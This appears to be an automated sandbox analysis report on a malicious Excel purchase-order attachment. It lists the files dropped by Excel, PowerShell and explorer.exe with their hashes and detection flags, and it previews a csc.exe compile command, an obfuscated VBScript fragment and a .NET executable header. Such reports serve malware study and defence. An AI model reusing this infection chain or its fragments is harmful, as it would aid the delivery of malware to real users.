                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):684032
                                                                                                                                                  Entropy (8bit):7.939143398598026
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:SI95bskcY20p3Sz4v3ujGCuVRqfPSMCfhhBKkle42mt7j3K5Rvy3esTVfME:jnbskQzzO+GRwSNjBKk/1M6BE
                                                                                                                                                  MD5:877476D9687CC83CD96330052EADD53C
                                                                                                                                                  SHA1:E00AF7151A7234D3C471EAC440DA03128C331C05
                                                                                                                                                  SHA-256:A62A0000E6CFE3A42C5CADD68B79FFBC58BE5B8DA97D6EFADD38685BA1159EE2
                                                                                                                                                  SHA-512:B62933C300D0BAA536A69157E3D2D7D4C2468110D97F0CD7BC4B8C5C7E6FA5B69BFCC776A95A44F2436349AB5B8B9BA97E107419AF02E44AC3A260E9A12A7783
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):512
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):512
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):676352
                                                                                                                                                  Entropy (8bit):7.983686457146692
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:mI95bskcY20p3Sz4v3ujGCuVRqfPSMCfhhBKkle42mt7j3K5Rvy3esTVfME:fnbskQzzO+GRwSNjBKk/1M6BE
                                                                                                                                                  MD5:31B8E815E3BEB1A6BE2EC33FF366FFFF
                                                                                                                                                  SHA1:FCC0FFA816A198B6F4220D16799EF79768DD7876
                                                                                                                                                  SHA-256:DF533F4B212F9E036D28048FB82786DFDDB58BB6F9A89B469B9A9CFFAFC71AEA
                                                                                                                                                  SHA-512:A98D442DD55667E3C90304F2ED1B3A553F1C25CE667D4B67F4B59B201C98C8011259B63523E869D805D9A73292B599781D990F47ADFF803C44D49C48EA6DED1C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):10240
                                                                                                                                                  Entropy (8bit):0.6739662216458647
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                                                                                                  MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                                                                                                  SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                                                                                                  SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                                                                                                  SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24152
                                                                                                                                                  Entropy (8bit):0.7513521539333206
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                                                                                                                                                  MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                                                                                                                                                  SHA1:FA589EA7BA858C514079289BCEA3625432110427
                                                                                                                                                  SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                                                                                                                                                  SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (377), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):141308
                                                                                                                                                  Entropy (8bit):3.677460277464518
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:DBkSUTu5S/BV4Mf8mOZG3WVGwB7xW9xjqGuvcQ6T0+gt5pzBGwm:mSU/B2e8muG3WQwNjG4cQ6TZgt5p9Gwm
                                                                                                                                                  MD5:855D024750A1BC1BC078E60C05E506E3
                                                                                                                                                  SHA1:480C344EF4E060ADB7CA7E159C815CB38AC87614
                                                                                                                                                  SHA-256:560327E8E4C818547FE966C8704D97270986B7457D62A154219E81ED4AFB4667
                                                                                                                                                  SHA-512:64A68DD3C8750E7A90C95078DC1DB87086C546212B56348E6D45F4444B5DD7E6725F3B5DDBC2C414D08A7DF2FBF2EECD11B9AB414588AC7B66F57F70FBB85C94
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:..........F.u.n.c.t.i.o.n. .e.n.g.o.m.a.d.e.l.a.(.B.y.V.a.l. .c.o.r.n.o.f.o.n.e.,. .B.y.V.a.l. .m.o.q.u.e.n.c.o.,. .B.y.V.a.l. .a.p.r.e.s.a.r.)..... . . . .D.i.m. .a.s.s.e.n.t.i.m.e.n.t.o..... . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.s.s.e.n.t.i.m.e.n.t.o. .>. .0..... . . . . . . . .c.o.r.n.o.f.o.n.e. .=. .L.e.f.t.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .-. .1.). .&. .a.p.r.e.s.a.r. .&. .M.i.d.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.m.o.q.u.e.n.c.o.).)..... . . . . . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.a.p.r.e.s.a.r.).,. .c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . .L.o.o.p..... . . . ..... . . . .e.n.g.o.m.a.d.e.l.a. .=. .c.o.r.n.o.f.o.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... .
                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):339146
                                                                                                                                                  Entropy (8bit):7.999485525251745
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:6144:TcbeQC4NbOeKphDokD6cnk2VRJl6C1bXhgvjuSX+2e+nO4qUuTAFfekd:TcqWixhND6Ik2Vnl6ebXhCjuM+cgX0ZF
                                                                                                                                                  MD5:A81CC72633761F32F16472439677E257
                                                                                                                                                  SHA1:3BEC07FF44EF0C29FE9A4EB682F4B7263A010175
                                                                                                                                                  SHA-256:D2A1F3839C9B8F03072F526983C236019038D4BEB952F89A34661D5A6D15B8B1
                                                                                                                                                  SHA-512:D7B759E8AF72EB81DEFEE1989E272C54629F5DADC97A36547916A03E829678CCF0C0C816CB1A4819D3D3D15DAB819838B494D8A3A4C326A09F2C110C5B83F8C0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:z+..).@u'(.N.7..#w*..........(.b.....n.......w.N..t.....mR6.}.._'X.LHn>...........h.Y.Rl..0.......R.3..rR...p..O8&k..=0H'..K.[.tq.H.y..G.="!.YW.d..q>.y..~h.V.'..?...p[.U..h.i...F.....KA.8.G...:....3.....+..i5..o.Qt.H..[..Q5z6U..1KcA....2-...n.v.......[.u.f..0..j.@.....v.........]....P..Sw.Z..w1%m...<...(........cI.-..=.e....g....*~$..L..4.....".....b=.d.8.-7....3x.}...]u..I9..n..}..x..2..q._8..K?..7...,>.<....4....F._e ...0X..ZZN..rMM..........H....E...T.kL..&53^.....'.o...4.[.Ho..;>..>.b...."..W....O.......%O.2.[...Qa'.....5Z[gCW...F.9...}J.;.UGc..n...,..^...a........9t...s.".F!|."...?|"..\....%OWP.../6,....G.|,...$.:....gf..L.&$..WY.@[-.k...W.li....7.....#....8M..$..pD.W.k...#...F...........G.nH..4.?XpT.!.z.Q..>1.]`..W...T.0_.b.^...".4..V.(.....E_#.....b..`n...}]N..A..<........@@.n.....{..5.....##.s.X...I..f./.m.....w.&H.....\..........5s....2...s.....OZ.Z.xl......{..y"*Ked....ye...:..ey.'......N1......lT...>5.]9...x.....x!Id..
                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):55384
                                                                                                                                                  Entropy (8bit):6.082605220064531
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:8F9E8FLLs2Zokf85dkRTc6Iq8Anqf7Px9pf+iuBqip1P:8fE6EkfOdkRT7xq9pf+3BHP
                                                                                                                                                  MD5:A1CC6D0A95AA5C113FA52BEA08847010
                                                                                                                                                  SHA1:76761992AD449C736771110047C8BBF14D85EEBD
                                                                                                                                                  SHA-256:D7409D01E21B22084F3C166022C69AD46DDD7AAAFF8EED6EB540961D3A196AEA
                                                                                                                                                  SHA-512:2C64159A49EDD906A8D971A9D7AFD62FDA47E36829CB7F0572D47F917AE62221C79E70962965216CB23C69718C2A2106355A04304095FA27071A2BD4AA120862
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: Ldegwikhzs.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.W32.MSIL_Agent.GJP.gen.Eldorado.13778.95.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.W32.MSIL_Agent.GIL.gen.Eldorado.20044.1173.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: P.O_2023-0394.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.W32.MSIL_Kryptik.JML.gen.Eldorado.26148.25502.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Mardom.MN.9.13268.1323.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: INVOICE_23DF-48609002.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SHIPPING_DOCUMENT.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Shipping_documents_SST2112-250.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.W32.MSIL_Agent.GIL.gen.Eldorado.30277.9800.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5p.\..............0................. ........@.. ....................................`.................................t...O.......................X>..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 18 17:21:53 2024, Security: 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):935936
                                                                                                                                                  Entropy (8bit):7.98633722227992
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:YnbskQzzO+GRwSNjBKk/1M6BE8pKVtCY+4IWBVK3:jlzzFGR/NjBKe1M6i+uwQIWy
                                                                                                                                                  MD5:D3DB307CCEF3E4632AA68BDC0F34A9A2
                                                                                                                                                  SHA1:82120AF403F42C8689E91B6D2C6EE653B91A622E
                                                                                                                                                  SHA-256:A5FEDD9D24354077A27E97170BE3C4DDFF79D03139BD22E45C5F8E1AFA43F555
                                                                                                                                                  SHA-512:725BC262EB996DA22766D21881FCB69E464283A0C4E5B7473DE84C76CF76C96041C8AEEB7BC4BF0356131231499C27E1FF7D785E8994A896307D846193958112
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:......................>...................................$...........................................................g.......i......................................................................................................................................................................................................................................................................................................................................................................................................."................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 18 17:21:53 2024, Security: 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):935936
                                                                                                                                                  Entropy (8bit):7.98633722227992
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:YnbskQzzO+GRwSNjBKk/1M6BE8pKVtCY+4IWBVK3:jlzzFGR/NjBKe1M6i+uwQIWy
                                                                                                                                                  MD5:D3DB307CCEF3E4632AA68BDC0F34A9A2
                                                                                                                                                  SHA1:82120AF403F42C8689E91B6D2C6EE653B91A622E
                                                                                                                                                  SHA-256:A5FEDD9D24354077A27E97170BE3C4DDFF79D03139BD22E45C5F8E1AFA43F555
                                                                                                                                                  SHA-512:725BC262EB996DA22766D21881FCB69E464283A0C4E5B7473DE84C76CF76C96041C8AEEB7BC4BF0356131231499C27E1FF7D785E8994A896307D846193958112
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......................>...................................$...........................................................g.......i......................................................................................................................................................................................................................................................................................................................................................................................................."................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 18 01:53:06 2024, Security: 1
                                                                                                                                                  Entropy (8bit):7.980944873491801
                                                                                                                                                  TrID:
                                                                                                                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                  File name:#U3010TW-S PO#U3011PO#3311-20241118003.xls
                                                                                                                                                  File size:1'181'184 bytes
                                                                                                                                                  MD5:6a9f4cbac228885c734793d88b691d2f
                                                                                                                                                  SHA1:e4afd16d467570807b14a28df304ef8f538cf30c
                                                                                                                                                  SHA256:92322c09584ce34faa099794f8a9aa425e7dc08ea803a4f3ff28be197418d8ed
                                                                                                                                                  SHA512:06dc9297fb1d681d2efbf0c519abd787fb2eb59595dadf812753586e5bb46bf185c6992bbb2d06eda93a13c2c568866098e0dfde07e187844c480e3cdf169754
                                                                                                                                                  SSDEEP:24576:juq9PLiijE2Z5Z2amgDCZkNwefrcjus3hVSfBzFTVOP8:juEPLiij7Z5ZKkAkNxfrcjuQ25zFBg8
                                                                                                                                                  TLSH:D2452349F884DF0BD596AC3315C7D4B31038BDC2AE96A3052B70B32E68769B50F9798D
                                                                                                                                                  File Content Preview:........................>...................................]...........................................................................b.......d..............................................................................................................
                                                                                                                                                  Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1
                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:False
                                                                                                                                                  Flash Objects Count:0
